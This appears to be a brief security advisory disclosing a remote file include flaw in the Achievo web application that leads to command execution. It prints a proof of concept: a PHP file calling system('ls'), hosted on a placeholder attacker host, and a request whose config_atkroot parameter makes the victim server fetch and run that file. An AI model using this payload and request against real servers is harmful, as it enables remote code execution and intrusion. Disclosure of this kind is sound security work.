Achievo Remote File Include Command Execution Vulnerability

The following example was submitted:

Create the following text file (ls.txt) and store it on the attacker host where it is publicly accessible:

<?php system('ls'); ?>

And cause the vulnerable script on the victim host to invoke it with the following request:

http://victimhost/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://attackerhost/ls.txt?


 

Privacy Statement
Copyright 2010, SecurityFocus